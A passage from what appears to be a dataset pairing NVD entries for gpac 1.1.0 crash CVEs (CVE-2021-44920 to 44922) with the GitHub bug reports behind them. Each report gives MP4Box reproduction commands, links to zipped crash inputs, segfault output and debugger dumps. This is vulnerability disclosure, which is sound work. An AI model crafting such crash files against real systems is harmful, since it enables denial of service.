box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861206 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 861206 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 1371476 segmentation fault ./MP4Box -lsr ./poc5 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff78a0f7d in gf_sg_vrml_mf_alloc () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x9f03c RCX 0x10 RDX 0x7ffff7e078a0 (CSWTCH.120) ◂— 0xc080c0804080404 RDI 0x32 RSI 0x32 R8 0x0 R9 0x0 R10 0x7ffff775bdeb ◂— 'gf_sg_vrml_mf_alloc' R11 0x7ffff78a0f30 (gf_sg_vrml_mf_alloc) ◂— endbr64 R12 0x0 R13 0x8 R14 0x0 R15 0x7fffffff6d60 ◂— 0x30646c6569665f /* '_field0' */ RBP 0x32 RSP 0x7fffffff6bf0 ◂— 0x9f03c RIP 0x7ffff78a0f7d (gf_sg_vrml_mf_alloc+77) ◂— cmp dword ptr [r12], ebx ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff78a0f7d <gf_sg_vrml_mf_alloc+77> cmp dword ptr [r12], ebx 0x7ffff78a0f81 <gf_sg_vrml_mf_alloc+81> je gf_sg_vrml_mf_alloc+125 <gf_sg_vrml_mf_alloc+125> ↓ 0x7ffff78a0fad <gf_sg_vrml_mf_alloc+125> add rsp, 8 0x7ffff78a0fb1 <gf_sg_vrml_mf_alloc+129> pop rbx 0x7ffff78a0fb2 <gf_sg_vrml_mf_alloc+130> pop rbp 0x7ffff78a0fb3 <gf_sg_vrml_mf_alloc+131> pop r12 0x7ffff78a0fb5 <gf_sg_vrml_mf_alloc+133> pop r13 0x7ffff78a0fb7 <gf_sg_vrml_mf_alloc+135> ret 0x7ffff78a0fb8 <gf_sg_vrml_mf_alloc+136> nop dword ptr [rax + rax] 0x7ffff78a0fc0 <gf_sg_vrml_mf_alloc+144> mov edx, ebx 0x7ffff78a0fc2 <gf_sg_vrml_mf_alloc+146> imul r13, rdx ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6bf0 ◂— 0x9f03c 01:0008│ 0x7fffffff6bf8 —▸ 0x7fffffff6d30 ◂— 0x3200000000 02:0010│ 0x7fffffff6c00 —▸ 0x5555555ded70 ◂— 0x0 03:0018│ 0x7fffffff6c08 ◂— 0x555df8c0 04:0020│ 0x7fffffff6c10 —▸ 0x5555555d2730 ◂— 0x0 05:0028│ 0x7fffffff6c18 —▸ 0x7ffff790f44d (BD_DecMFFieldVec+589) ◂— mov r14d, eax 06:0030│ 0x7fffffff6c20 ◂— 0x0 07:0038│ 0x7fffffff6c28 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff78a0f7d gf_sg_vrml_mf_alloc+77 f 1 0x7ffff790f44d BD_DecMFFieldVec+589 f 2 0x7ffff7906205 gf_bifs_dec_proto_list+1333 f 3 0x7ffff7906549 BD_DecSceneReplace+73 f 4 0x7ffff7914e2e BM_SceneReplace+110 f 5 0x7ffff7914ff3 BM_ParseCommand+179 f 6 0x7ffff7915323 gf_bifs_decode_command_list+163 f 7 0x7ffff7aa1da2 gf_sm_load_run_isom+1218 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff78a0f7d in gf_sg_vrml_mf_alloc () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #1 0x00007ffff790f44d in BD_DecMFFieldVec () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #2 0x00007ffff7906205 in gf_bifs_dec_proto_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #3 0x00007ffff7906549 in BD_DecSceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #4 0x00007ffff7914e2e in BM_SceneReplace () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #5 0x00007ffff7914ff3 in BM_ParseCommand () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #6 0x00007ffff7915323 in gf_bifs_decode_command_list () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #7 0x00007ffff7aa1da2 in gf_sm_load_run_isom () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #8 0x00005555555844a8 in dump_isom_scene () #9 0x000055555557b42c in mp4boxMain () #10 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe198) at ../csu/libc-start.c:308 #11 0x000055555556c45e in _start () ```
Null Pointer Dereference in gf_sg_vrml_mf_alloc()
https://api.github.com/repos/gpac/gpac/issues/1963/comments
1
2021-12-10T09:54:17Z
2021-12-10T10:17:26Z
https://github.com/gpac/gpac/issues/1963
1,076,656,843
1,963
2,889
CVE-2021-44920
2021-12-21T21:15:07.587
An invalid memory address dereference vulnerability exists in gpac 1.1.0 in the dump_od_to_saf.isra function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1957" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1957" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "119" ]
119
https://github.com/gpac/gpac/issues/1957
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ An invalid memory address dereference was discovered in dump_od_to_saf.isra(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc ``` [poc.zip](https://github.com/gpac/gpac/files/7691035/poc.zip) **Result** ``` [iso file] Unknown box type stbU in parent minf [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Box "lpod" (start 11062) has 1 extra bytes [iso file] Box "REFT" is larger than container box [iso file] Box "tref" size 28 (start 11054) invalid (read 261) [iso file] Incomplete box mdat - start 11495 size 861261 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] Unknown box type stbU in parent minf [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Box "lpod" (start 11062) has 1 extra bytes [iso file] Box "REFT" is larger than container box [iso file] Box "tref" size 28 (start 11054) invalid (read 261) [iso file] Incomplete box mdat - start 11495 size 861261 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing Scene loaded - dumping 2 systems streams [1] 3146070 segmentation fault ./MP4Box -lsr ./submit/poc1 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7ab7dcc in dump_od_to_saf.isra () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x61 RBX 0x5555555df200 ◂— 0x1 RCX 0x5555555df330 ◂— 0x8001000f RDX 0x7ffff72bf040 ◂— 0x7ffff72bf040 RDI 0x5555555dfe10 ◂— 0xfbad2c84 RSI 0x7ffff7e46910 ◂— ' streamType="%d" objectTypeIndication="%d" timeStampResolution="%d"' R8 0x3e8 R9 0x27 R10 0x7ffff7e4690b ◂— 0x7473200000000022 /* '"' */ R11 0x7fffffff70e3 ◂— 0xcba6003936373233 /* '32769' */ R12 0x5555555decc0 —▸ 0x5555555dfe10 ◂— 0xfbad2c84 R13 0x0 R14 0x5555555df150 ◂— 0x0 R15 0x0 RBP 0x0 RSP 0x7fffffff7220 —▸ 0x5555555df330 ◂— 0x8001000f RIP 0x7ffff7ab7dcc (dump_od_to_saf.isra+204) ◂— movzx edx, byte ptr [rax + 8] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7ab7dcc <dump_od_to_saf.isra+204> movzx edx, byte ptr [rax + 8] 0x7ffff7ab7dd0 <dump_od_to_saf.isra+208> mov ecx, dword ptr [rax + 4] 0x7ffff7ab7dd3 <dump_od_to_saf.isra+211> xor eax, eax 0x7ffff7ab7dd5 <dump_od_to_saf.isra+213> call gf_fprintf@plt <gf_fprintf@plt> 0x7ffff7ab7dda <dump_od_to_saf.isra+218> mov rdx, qword ptr [r14] 0x7ffff7ab7ddd <dump_od_to_saf.isra+221> test rdx, rdx 0x7ffff7ab7de0 <dump_od_to_saf.isra+224> jne dump_od_to_saf.isra+392 <dump_od_to_saf.isra+392> 0x7ffff7ab7de6 <dump_od_to_saf.isra+230> mov rdi, qword ptr [r12] 0x7ffff7ab7dea <dump_od_to_saf.isra+234> test r15, r15 0x7ffff7ab7ded <dump_od_to_saf.isra+237> je dump_od_to_saf.isra+266 <dump_od_to_saf.isra+266> 0x7ffff7ab7def <dump_od_to_saf.isra+239> mov rdx, qword ptr [r15 + 8] ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff7220 —▸ 0x5555555df330 ◂— 0x8001000f 01:0008│ 0x7fffffff7228 ◂— 0x100000002 02:0010│ 0x7fffffff7230 —▸ 0x5555555df030 —▸ 0x5555555df580 ◂— 0x0 03:0018│ 0x7fffffff7238 ◂— 0x0 04:0020│ 0x7fffffff7240 —▸ 0x5555555df030 —▸ 0x5555555df580 ◂— 0x0 05:0028│ 0x7fffffff7248 ◂— 0x0 06:0030│ 0x7fffffff7250 ◂— 0x0 07:0038│ 0x7fffffff7258 —▸ 0x5555555df150 ◂— 0x0 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7ab7dcc dump_od_to_saf.isra+204 f 1 0x7ffff7ac27dd gf_sm_dump+1853 f 2 0x555555584418 dump_isom_scene+616 f 3 0x55555557b42c mp4boxMain+9228 f 4 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7ab7dcc in dump_od_to_saf.isra () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #1 0x00007ffff7ac27dd in gf_sm_dump () from /root/fuckit/test/gpac-master/bin/gcc/libgpac.so.10 #2 0x0000555555584418 in dump_isom_scene () #3 0x000055555557b42c in mp4boxMain () #4 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe1a8, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe198) at ../csu/libc-start.c:308 #5 0x000055555556c45e in _start () ```
Invalid memory address dereference in dump_od_to_saf.isra()
https://api.github.com/repos/gpac/gpac/issues/1957/comments
0
2021-12-10T08:00:30Z
2021-12-10T10:01:22Z
https://github.com/gpac/gpac/issues/1957
1,076,547,293
1,957
2,890
CVE-2021-44921
2021-12-21T21:15:07.630
A null pointer dereference vulnerability exists in gpac 1.1.0 in the gf_isom_parse_movie_boxes_internal function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1964" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1964" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1964
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in gf_isom_parse_movie_boxes_internal(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_1 ``` [poc_1.zip](https://github.com/gpac/gpac/files/7692191/poc_1.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] Read Box type 00000000 (0x00000000) at position 4494 has size 0 but is not at root/file level, skipping [iso file] Read Box "hinf" (start 4390) failed (End Of Stream / File) - skipping [iso file] Read Box "udta" (start 4178) failed (End Of Stream / File) - skipping [iso file] Read Box "trak" (start 2229) failed (End Of Stream / File) - skipping [iso file] Read Box "moov" (start 20) failed (End Of Stream / File) - skipping [1] 2155243 segmentation fault ./MP4Box -lsr ./poc/poc_1 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. 0x00007ffff7973829 in gf_isom_parse_movie_boxes_internal () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x1 RBX 0x5555555c72a0 ◂— 0x0 RCX 0x7ffff764d1e7 (write+23) ◂— cmp rax, -0x1000 /* 'H=' */ RDX 0x0 RDI 0x5555555c62a0 ◂— 0x0 RSI 0x0 R8 0x0 R9 0x0 R10 0x7ffff7e227df ◂— ') - skipping\n' R11 0x246 R12 0x0 R13 0x0 R14 0x5555555c72a0 ◂— 0x0 R15 0x3 RBP 0x7fffffff83a0 ◂— 0x0 RSP 0x7fffffff8310 —▸ 0x7fffffff8350 ◂— 0x0 RIP 0x7ffff7973829 (gf_isom_parse_movie_boxes_internal+249) ◂— mov eax, dword ptr [rsi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── ► 0x7ffff7973829 <gf_isom_parse_movie_boxes_internal+249> mov eax, dword ptr [rsi] 0x7ffff797382b <gf_isom_parse_movie_boxes_internal+251> cmp eax, 0x6d6f6f76 0x7ffff7973830 <gf_isom_parse_movie_boxes_internal+256> je gf_isom_parse_movie_boxes_internal+1688 <gf_isom_parse_movie_boxes_internal+1688> ↓ 0x7ffff7973dc8 <gf_isom_parse_movie_boxes_internal+1688> cmp qword ptr [r14 + 0x48], 0 0x7ffff7973dcd <gf_isom_parse_movie_boxes_internal+1693> jne gf_isom_parse_movie_boxes_internal+4630 <gf_isom_parse_movie_boxes_internal+4630> ↓ 0x7ffff7974946 <gf_isom_parse_movie_boxes_internal+4630> mov esi, 1 0x7ffff797494b <gf_isom_parse_movie_boxes_internal+4635> mov edi, 2 0x7ffff7974950 <gf_isom_parse_movie_boxes_internal+4640> call gf_log_tool_level_on@plt <gf_log_tool_level_on@plt> 0x7ffff7974955 <gf_isom_parse_movie_boxes_internal+4645> test eax, eax 0x7ffff7974957 <gf_isom_parse_movie_boxes_internal+4647> je gf_isom_parse_movie_boxes_internal+4540 <gf_isom_parse_movie_boxes_internal+4540> 0x7ffff7974959 <gf_isom_parse_movie_boxes_internal+4649> mov esi, 2 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff8310 —▸ 0x7fffffff8350 ◂— 0x0 01:0008│ 0x7fffffff8318 ◂— 0x0 ... ↓ 2 skipped 04:0020│ 0x7fffffff8330 —▸ 0x5555555c7500 ◂— 0x6d703431 /* '14pm' */ 05:0028│ 0x7fffffff8338 ◂— 0x0 06:0030│ 0x7fffffff8340 ◂— 0x0 07:0038│ 0x7fffffff8348 ◂— 0x4 ────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────── ► f 0 0x7ffff7973829 gf_isom_parse_movie_boxes_internal+249 f 1 0x7ffff7974f97 gf_isom_open_file+311 f 2 0x55555557dc14 mp4boxMain+19444 f 3 0x7ffff75630b3 __libc_start_main+243 ────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 0x00007ffff7973829 in gf_isom_parse_movie_boxes_internal () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #1 0x00007ffff7974f97 in gf_isom_open_file () from /root/fuckit/test/gpac1210/bin/gcc/libgpac.so.10 #2 0x000055555557dc14 in mp4boxMain () #3 0x00007ffff75630b3 in __libc_start_main (main=0x55555556c420 <main>, argc=3, argv=0x7fffffffe188, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe178) at ../csu/libc-start.c:308 #4 0x000055555556c45e in _start () ```
Null Pointer Dereference in gf_isom_parse_movie_boxes_internal()
https://api.github.com/repos/gpac/gpac/issues/1964/comments
0
2021-12-10T10:59:02Z
2021-12-13T13:22:06Z
https://github.com/gpac/gpac/issues/1964
1,076,718,691
1,964
2,891
CVE-2021-44922
2021-12-21T21:15:07.673
A null pointer dereference vulnerability exists in gpac 1.1.0 in the BD_CheckSFTimeOffset function, which causes a segmentation fault and application crash.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1969" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1969" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "56FF2AB9-517D-43A7-867E-9FB6B833194F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1969
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A null pointer dereference was discovered in BD_CheckSFTimeOffset(). The vulnerability causes a segmentation fault and application crash. **Version:** ``` MP4Box - GPAC version 1.1.0-DEV-revUNKNOWN_REV (c) 2000-2021 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **System information** Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz **command:** ``` ./MP4Box -lsr poc_7 ``` [poc_7.zip](https://github.com/gpac/gpac/files/7693705/poc_7.zip) **Result** ``` [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 796203 [iso file] Incomplete file while reading for dump - aborting parsing [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Incomplete box mdat - start 11495 size 796203 [iso file] Incomplete file while reading for dump - aborting parsing MPEG-4 BIFS Scene Parsing [1] 1900424 segmentation fault ./MP4Box -lsr ./poc/poc_7 ``` **gdb** ``` Program received signal SIGSEGV, Segmentation fault. __strcasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:199 199 ../sysdeps/x86_64/multiarch/strcmp-sse42.S: No such file or directory. LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────── RAX 0x0 RBX 0x5555555decb0 ◂— 0x0 *RCX 0x17 *RDX 0x7ffff77284a0 (_nl_global_locale) —▸ 0x7ffff77246c0 (_nl_C_LC_CTYPE) —▸ 0x7ffff76f4fc6 (_nl_C_name) ◂— 0x636d656d5f5f0043 /* 'C' */ *RDI 0x0 *RSI 0x7ffff7dfd2d7 ◂— 'startTime' R8 0x0 R9 0x0 *R10 0x7ffff775b844 ◂— 'gf_node_get_tag' *R11 0x7ffff7849790 (gf_node_get_tag) ◂— endbr64 *R12 0x0 R13 0x5555555dfe70 —▸ 0x5555555dfed0 ◂— 0x100000067 /* 'g' */ R14 0x5555555dff50 ◂— 0x21e8e8512be35500 R15 0x0 *RBP 0x7fffffff6740 ◂— 0x200000002 *RSP 0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test eax, eax *RIP 0x7ffff76c4089 (__strcasecmp_l_avx+69) ◂— vmovdqu xmm1, xmmword ptr [rdi] ──────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────── 0x7ffff76c4077 <__strcasecmp_l_avx+51> vmovdqa xmm6, xmmword ptr [rip + 0x378f1] 0x7ffff76c407f <__strcasecmp_l_avx+59> cmp ecx, 0x30 0x7ffff76c4082 <__strcasecmp_l_avx+62> ja __strcasecmp_l_avx+172 <__strcasecmp_l_avx+172> 0x7ffff76c4084 <__strcasecmp_l_avx+64> cmp eax, 0x30 0x7ffff76c4087 <__strcasecmp_l_avx+67> ja __strcasecmp_l_avx+172 <__strcasecmp_l_avx+172> ► 0x7ffff76c4089 <__strcasecmp_l_avx+69> vmovdqu xmm1, xmmword ptr [rdi] 0x7ffff76c408d <__strcasecmp_l_avx+73> vmovdqu xmm2, xmmword ptr [rsi] 0x7ffff76c4091 <__strcasecmp_l_avx+77> vpcmpgtb xmm7, xmm1, xmm4 0x7ffff76c4095 <__strcasecmp_l_avx+81> vpcmpgtb xmm8, xmm1, xmm5 0x7ffff76c4099 <__strcasecmp_l_avx+85> vpcmpgtb xmm9, xmm2, xmm4 0x7ffff76c409d <__strcasecmp_l_avx+89> vpcmpgtb xmm10, xmm2, xmm5 ──────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────── 00:0000│ rsp 0x7fffffff6688 —▸ 0x7ffff790dc51 (BD_CheckSFTimeOffset+49) ◂— test eax, eax 01:0008│ 0x7fffffff6690 —▸ 0x5555555decb0 ◂— 0x0 02:0010│ 0x7fffffff6698 —▸ 0x5555555d26d0 ◂— 0x0 03:0018│ 0x7fffffff66a0 —▸ 0x7fffffff6740 ◂— 0x200000002 04:0020│ 0x7fffffff66a8 —▸ 0x7ffff790ed35 (gf_bifs_dec_sf_field+2053) ◂— mov eax, dword ptr [rbx] 05:0028│ 0x7fffffff66b0 —▸ 0x5555555dfe90 ◂— 0x11cb 06:0030│ 0x7fffffff66b8 ◂— 0x22 /* '"' */ 07:0038│ 0x7fffffff66c0 ◂— 0x11cb 